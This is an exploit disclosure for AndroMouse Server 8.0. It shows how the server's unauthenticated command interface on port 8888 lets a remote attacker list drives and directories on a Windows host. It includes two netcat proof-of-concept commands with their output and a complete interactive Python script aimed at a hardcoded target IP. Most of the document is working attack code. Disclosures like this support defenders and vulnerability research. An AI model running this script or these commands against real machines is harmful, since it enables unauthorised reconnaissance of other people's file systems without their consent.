# Exploit Title: AndroMouse Server 8.0 – Unauthenticated Directory Enumeration # Date: 03/07/25 # Exploit Author: Chokri Hammedi # Vendor Homepage: http://andromouse.com # Software Link: https://andromouse-server.en.lo4d.com/windows # Version: 8.0 # Tested on: Windows 10 r''' Description: AndroMouse Server 8.0 exposes an unauthenticated TCP command interface on port 8888. A remote attacker can send crafted commands such as file_browser_root and file_browser| to enumerate the contents of arbitrary directories on the host file system, without user interaction or authentication. POC 1: echo -e "file_browser_root\n" | nc 192.168.8.104 8888 file_browser_root|C:\|F:\ POC 2: echo -e "file_browser|C:\Users\public\\n" | nc 192.168.8.104 8888 file_browser | C:\Users\public | | |Documents|Downloads|Music|Pictures|Videos ''' import socket import time try: import readline except ImportError: try: import pyreadline as readline except ImportError: readline = None TARGET_IP = "192.168.8.104" UDP_PORT = 8888 TCP_PORT = 8888 NEWLINE = b"\x0a" def establish_udp_connection(): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: sock.sendto(b"connection_detect_server" + NEWLINE, (TARGET_IP, UDP_PORT)) time.sleep(1) sock.sendto(b"connection_detect_server" + NEWLINE, (TARGET_IP, UDP_PORT)) time.sleep(1) finally: sock.close() def tcp_connect(): while True: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((TARGET_IP, TCP_PORT)) return sock except Exception as e: print(f"[!] TCP connection failed: {e}. Retrying in 3s...") time.sleep(3) establish_udp_connection() def send_command(sock, command): try: sock.sendall(command.encode() + NEWLINE) time.sleep(0.5) response = sock.recv(4096).decode(errors="ignore").strip() return response except (socket.timeout, ConnectionError, OSError) as e: raise e def list_drives(sock): response = send_command(sock, "file_browser_root") if "file_browser_root|" in response: drives = [d.strip() for d in response.split("|")[1:] if d.strip()] print("\nAvailable Drives:") for drive in drives: print(f" {drive}\\") return drives print("No drives found") return [] def list_directory(sock, path): response = send_command(sock, f"file_browser|{path}") if "file_browser |" in response: parts = [p.strip() for p in response.split("|")] if len(parts) >= 4: current_path = parts[1] all_items = [item for item in parts[3:] if item.strip()] folders = [] files = [] for item in all_items: if '.' in item.split('\\')[-1]: files.append(item) else: folders.append(item) print(f"\nContents of {current_path}\n") for folder in folders: print(f" {folder}") for file in files: print(f" {file}") print(f"\nTotal: {len(files)} files, {len(folders)} directories") return folders + files print("Directory not found or access denied") return [] def interactive_shell(): establish_udp_connection() sock = tcp_connect() if readline: readline.parse_and_bind("tab: complete") readline.parse_and_bind("set editing-mode emacs") readline.parse_and_bind("set history-preserve-point on") while True: try: print("\n1. List drives\n2. Browse directory\n3. Exit") choice = input("> ").strip() if readline and choice: readline.add_history(choice) if choice == "1": list_drives(sock) elif choice == "2": path = input("Enter path (e.g. C:\\): ").strip() if path: if not path.endswith("\\"): path += "\\" list_directory(sock, path) elif choice == "3": break except (socket.timeout, ConnectionError, OSError) as e: print(f"[!] Connection lost: {e}. Reconnecting...") try: sock.close() except: pass establish_udp_connection() sock = tcp_connect() except Exception as e: print(f"[!] Unexpected error: {e}") try: sock.close() except: pass break try: sock.close() except: pass print("[✓] Session ended.") if __name__ == "__main__": interactive_shell()